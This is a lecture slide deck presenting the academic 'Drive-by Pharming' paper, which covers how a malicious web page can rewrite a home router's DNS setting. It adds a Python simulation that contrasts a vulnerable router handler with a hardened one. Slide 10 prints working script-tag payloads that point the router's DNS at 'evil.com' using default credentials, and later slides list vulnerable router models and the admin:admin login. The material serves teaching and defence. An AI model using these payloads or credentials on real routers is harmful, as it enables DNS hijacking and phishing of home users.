
Drive-by Pharming



  1. Drive-by Pharming. S. Stamm, Z. Ramzan, and M. Jakobsson. Presented by Anh Le.

  2. Authors
  • Sid Stamm - Indiana University - Google Intern
  • Dr. Zulfikar Ramzan - Technical Director of Symantec Security
  • Prof. Markus Jakobsson - Indiana University - Principal Scientist at Palo Alto Research Center (PARC)
  Anh Le - UC Irvine - 2009

  3. Outline
  • Introduction
  • Preliminaries and Previous Work
  • Drive-By Pharming
  • Demo
  • New Attacks and Recent Events
  • Conclusion and Discussion

  4. 1. Introduction
  • Motivation:
    • Total control of home broadband routers
    • Phishing (by changing the DNS setting)
    • Botnets (by changing the firmware)
  • How:
    • Attacker sets up an "evil" web page
    • Victim visits the evil web page
    • Victim's home router is compromised
    • No physical proximity required
  • Enablers:
    • JavaScript-enabled web browsers
    • Default password management on the routers

  5. 2a. Preliminaries
  • DNS: Domain Name System
  [Figure: the client asks its DNS server (the home router) "What's the IP of yahoo.com?"; the server answers "yahoo.com's IP is 206.190.60.37"]

  6. 2a. Preliminaries (cont.)
  • Phishing: a type of social engineering attack to obtain access credentials
  • Pharming: an attack aiming to redirect a website's traffic to another, bogus website

  7. 2b. Previous Work
  [Figure: a web page loaded from the Internet probes the LAN: "Detecting ... Your internal subnet is 10.0.0.0/24!" and "Detecting ... You have a Linksys router, and its IP is 10.0.0.1!"]
  • Internal Net Discovery [Kindermann 2003]: Java applet
  • Host Scanning [Grossman 2006, SPI Labs 2006]: JavaScript
  • Fingerprint the router using its default password and the names of its images

  8. Outline (repeated from slide 3)

  9. 3. Drive-By Pharming
  [Figure: a page from the Internet reaches the home router; "DNS Setting Changed!"]

  10. 3. Drive-By Pharming
  • How is it possible?
  • HTTP GET configuration: the router accepts its settings as query parameters, e.g.
    http://10.0.0.1/apply.cgi?dns=new-dns-server.com
  • Off-site script inclusion: the attacker's page makes the victim's browser issue that GET from inside the LAN:
    <script src="http://10.0.0.1/apply.cgi?dns=evil.com"></script>
  • What if the router is password-protected? Put the (default) credentials in the URL:
    <script src="http://usr:pwd@10.0.0.1/apply.cgi?dns=evil.com"></script>
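  Added example (not from the slides or the authors' paper): a constructed stand-in for a router's configuration CGI, shown in two versions. The vulnerable version does what slide 10 relies on: it accepts a GET with Basic credentials from any page. The hardened version refuses the same request on four independent grounds (factory password still set, GET instead of POST, foreign Origin/Referer, missing CSRF token). The router address, credentials, the "evil.example" attacker host and the field names are assumptions; the drive-by request is built to match what a browser emits for the script tag on slide 10 (URL userinfo becomes a Basic Authorization header, the attacker's page becomes the Referer).

```python
import base64
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for a home router's configuration CGI (not any
# vendor's firmware). Router origin, default credentials and field names
# are assumptions for the example.
ROUTER_ORIGIN = "http://10.0.0.1"
DEFAULT_USER, DEFAULT_PASSWORD = "admin", "admin"


@dataclass
class Request:
    method: str
    url: str                                    # full URL incl. query string
    headers: dict = field(default_factory=dict)
    body: dict = field(default_factory=dict)    # parsed form fields (POST)


@dataclass
class Router:
    dns: str = "206.190.60.37"                  # current resolver (assumed)
    password: str = DEFAULT_PASSWORD
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


def _basic_auth_ok(router, headers):
    """Validate an HTTP Basic Authorization header against the router password."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Basic "):
        return False
    try:
        user, _, pw = base64.b64decode(auth[6:]).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return False
    return user == DEFAULT_USER and hmac.compare_digest(pw, router.password)


def apply_cgi_vulnerable(router, req):
    """The slide-10 behaviour: any authenticated GET changes the DNS setting."""
    if not _basic_auth_ok(router, req.headers):
        return 401
    params = parse_qs(urlsplit(req.url).query)
    if "dns" in params:
        router.dns = params["dns"][0]
    return 200


def apply_cgi_hardened(router, req):
    """Same endpoint with the checks a drive-by request cannot satisfy."""
    if not _basic_auth_ok(router, req.headers):
        return 401
    # 1. No configuration changes while the factory password is still in use.
    if router.password == DEFAULT_PASSWORD:
        return 403
    # 2. State changes only via POST; <script src>/<img src> can only GET.
    if req.method != "POST":
        return 405
    # 3. A cross-site request carries the attacker's page as Origin/Referer;
    #    an absent header is treated as foreign (deliberate fail-closed choice).
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin != ROUTER_ORIGIN and not origin.startswith(ROUTER_ORIGIN + "/"):
        return 403
    # 4. Per-session token that the attacker's page cannot read (same-origin policy).
    if not hmac.compare_digest(req.body.get("csrf", ""), router.csrf_token):
        return 403
    if "dns" in req.body:
        router.dns = req.body["dns"]
    return 200


def drive_by_request(password, method="GET"):
    """What the victim's browser sends for
    <script src="http://admin:<password>@10.0.0.1/apply.cgi?dns=evil.com">
    (GET), or for an auto-submitted cross-site form (POST)."""
    token = base64.b64encode(f"{DEFAULT_USER}:{password}".encode()).decode()
    headers = {"Authorization": "Basic " + token, "Referer": "http://evil.example/"}
    if method == "GET":
        return Request("GET", ROUTER_ORIGIN + "/apply.cgi?dns=evil.com", headers)
    return Request("POST", ROUTER_ORIGIN + "/apply.cgi", headers, {"dns": "evil.com"})


def legitimate_request(router, new_dns):
    """The router's own admin page submitting the form with its CSRF token."""
    token = base64.b64encode(f"{DEFAULT_USER}:{router.password}".encode()).decode()
    headers = {"Authorization": "Basic " + token, "Origin": ROUTER_ORIGIN}
    return Request("POST", ROUTER_ORIGIN + "/apply.cgi", headers,
                   {"dns": new_dns, "csrf": router.csrf_token})


def demo():
    """Run the drive-by request against both handlers; returns status codes."""
    out = {}
    r1 = Router()
    out["vulnerable"] = apply_cgi_vulnerable(r1, drive_by_request("admin"))
    out["vulnerable_dns"] = r1.dns
    r2 = Router()
    out["hardened_default_pw"] = apply_cgi_hardened(r2, drive_by_request("admin"))
    out["hardened_default_pw_dns"] = r2.dns
    r3 = Router(password="s3cret")                  # assumed non-default password
    out["hardened_get"] = apply_cgi_hardened(r3, drive_by_request("s3cret"))
    out["hardened_cross_site_post"] = apply_cgi_hardened(r3, drive_by_request("s3cret", "POST"))
    out["hardened_legit"] = apply_cgi_hardened(r3, legitimate_request(r3, "9.9.9.9"))
    out["hardened_legit_dns"] = r3.dns
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

  The order of the checks matters for the slides' argument: the default-password check alone would stop the attack on slide 10, but the POST, origin and token checks are what still hold when the attacker has guessed or fingerprinted a non-default password.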

  11. 3. Drive-By Pharming (cont.)
  • Assumptions:
    • JavaScript-enabled web browser
    • Default password management
  • Vulnerable routers:
    • Netgear WGR614
    • D-Link DI-524
    • Linksys WRT54G
    • Cisco 806, 826, ...
    • ...

  12. 3. Drive-By Pharming (cont.)
  • Verizon [Modem + Router] MI424-WR
  • Default credentials: admin:admin

  13. 4. Demo

  14. Outline (repeated from slide 3)

  15. 5. New Attacks and Recent Events
  • New attacks:
    • Growing zombies/botnets by installing evil firmware
    • Viral spread: a compromised router auto-recruits other routers
  • Recent events:
    • Kaminsky DNS vulnerability (July 2008): cache poisoning attacks on any nameserver!
    • Router botnets (March 2009!)

  16. 6. Conclusion and Discussion
  • Routers with default password management are easily compromised
  • Browsers as conduits of attacks into the internal network
  • An army of router botnets

